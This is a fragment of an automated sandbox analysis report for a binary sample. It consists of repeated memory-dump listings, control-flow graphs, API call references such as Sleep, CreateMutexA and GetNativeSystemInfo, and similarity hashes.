                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: ad2cd9e8f9825111861c8f3573cf19bec54327c59de593add711e1932313fe4f
                                                                                                                                                                                                                                          • Instruction ID: 44d863147fb35e19a28a0b38ec11104b343ff5c845d45f812dc59ffb1b12669c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad2cd9e8f9825111861c8f3573cf19bec54327c59de593add711e1932313fe4f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41212D3134A284F7FB29A76E9C8A73DB751DFD9300F244816E144D63D2DABD79418193

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 477 7ea34f-7ea35b 478 7ea35d-7ea36b 477->478 479 7ea371-7ea39a call 7fd663 477->479 478->479 480 7ea93a 478->480 485 7ea39c-7ea3a8 479->485 486 7ea3c8-7ea916 call 7f80c0 479->486 482 7ea953-7ea994 Sleep CreateMutexA 480->482 483 7ea93a call 816c6a 480->483 492 7ea996-7ea998 482->492 493 7ea9a7-7ea9a8 482->493 483->482 489 7ea3be-7ea3c5 call 7fd663 485->489 490 7ea3aa-7ea3b8 485->490 489->486 490->480 490->489 492->493 496 7ea99a-7ea9a5 492->496 496->493
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 729e736c3978fc848af105a79a1f72c214460e7d967c2c54517fc20e1b83d466
                                                                                                                                                                                                                                          • Instruction ID: aa51750f621ae36394142d1beba4c8195b02ef38f86dd498e791b2476f5c8a0b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 729e736c3978fc848af105a79a1f72c214460e7d967c2c54517fc20e1b83d466
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74216A32605240EBEB189B6DDC8576CF772EBD5311F204219E404DB7D5D7BD79808252

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 536 7e7d30-7e7db2 call 8140f0 540 7e7db8-7e7de0 call 7f7a00 call 7e5c10 536->540 541 7e8356-7e8373 call 7fcff1 536->541 548 7e7de4-7e7e06 call 7f7a00 call 7e5c10 540->548 549 7e7de2 540->549 554 7e7e0a-7e7e23 548->554 555 7e7e08 548->555 549->548 558 7e7e54-7e7e7f 554->558 559 7e7e25-7e7e34 554->559 555->554 562 7e7eb0-7e7ed1 558->562 563 7e7e81-7e7e90 558->563 560 7e7e4a-7e7e51 call 7fd663 559->560 561 7e7e36-7e7e44 559->561 560->558 561->560 566 7e8374 call 816c6a 561->566 564 7e7ed7-7e7edc 562->564 565 7e7ed3-7e7ed5 GetNativeSystemInfo 562->565 568 7e7ea6-7e7ead call 7fd663 563->568 569 7e7e92-7e7ea0 563->569 570 7e7edd-7e7ee6 564->570 565->570 577 7e8379-7e837f call 816c6a 566->577 568->562 569->566 569->568 575 7e7ee8-7e7eef 570->575 576 7e7f04-7e7f07 570->576 579 7e7ef5-7e7eff 575->579 580 7e8351 575->580 581 7e7f0d-7e7f16 576->581 582 7e82f7-7e82fa 576->582 584 7e834c 579->584 580->541 585 7e7f18-7e7f24 581->585 586 7e7f29-7e7f2c 581->586 582->580 587 7e82fc-7e8305 582->587 584->580 585->584 589 7e82d4-7e82d6 586->589 590 7e7f32-7e7f39 586->590 591 7e832c-7e832f 587->591 592 7e8307-7e830b 587->592 595 7e82d8-7e82e2 589->595 596 7e82e4-7e82e7 589->596 597 7e7f3f-7e7f9b call 7f7a00 call 7e5c10 call 7f7a00 call 7e5c10 call 7e5d50 590->597 598 7e8019-7e82bd call 7f7a00 call 7e5c10 call 7f7a00 call 7e5c10 call 7e5d50 call 7f7a00 call 7e5c10 call 7e5730 call 7f7a00 call 7e5c10 call 7f7a00 call 7e5c10 call 7e5d50 call 7f7a00 call 7e5c10 call 7e5730 call 7f7a00 call 7e5c10 call 7f7a00 call 7e5c10 call 7e5d50 call 7f7a00 call 7e5c10 call 7e5730 call 7f7a00 call 7e5c10 call 7f7a00 call 7e5c10 call 7e5d50 call 7f7a00 call 7e5c10 call 7e5730 590->598 593 7e833d-7e8349 591->593 594 7e8331-7e833b 591->594 599 7e830d-7e8312 592->599 600 7e8320-7e832a 592->600 593->584 594->580 595->584 596->580 602 7e82e9-7e82f5 596->602 621 7e7fa0-7e7fa7 597->621 635 7e82c3-7e82cc 598->635 599->600 604 7e8314-7e831e 599->604 600->580 602->584 604->580 623 7e7fab-7e7fcb call 818bbe 621->623 624 7e7fa9 621->624 631 7e7fcd-7e7fdc 623->631 632 7e8002-7e8004 623->632 624->623 636 7e7fde-7e7fec 631->636 637 7e7ff2-7e7fff call 7fd663 631->637 634 7e800a-7e8014 632->634 632->635 634->635 635->582 639 7e82ce 635->639 636->577 636->637 637->632 639->589
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007E7ED3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1721193555-0
                                                                                                                                                                                                                                          • Opcode ID: ce159da4b4fd039d81a898dc53b3fff9eb6ec08d0640da3e8e46fb26ac863bd2
                                                                                                                                                                                                                                          • Instruction ID: 9301f13a39d8b14c2f3c68cd5684c01d5c25c4a4935661ac4060cb2526885af2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce159da4b4fd039d81a898dc53b3fff9eb6ec08d0640da3e8e46fb26ac863bd2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E10770E05288DBDB18BB298D4B7AD7A71BB4A714F944288E415A73C2DB394E9187C2

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 835 81d82f-81d83a 836 81d848-81d84e 835->836 837 81d83c-81d846 835->837 839 81d850-81d851 836->839 840 81d867-81d878 RtlAllocateHeap 836->840 837->836 838 81d87c-81d887 call 8175f6 837->838 844 81d889-81d88b 838->844 839->840 842 81d853-81d85a call 819dc0 840->842 843 81d87a 840->843 842->838 848 81d85c-81d865 call 818e36 842->848 843->844 848->838 848->840
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0081A813,00000001,00000364,00000006,000000FF,?,0081EE3F,?,00000004,00000000,?,?), ref: 0081D871
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
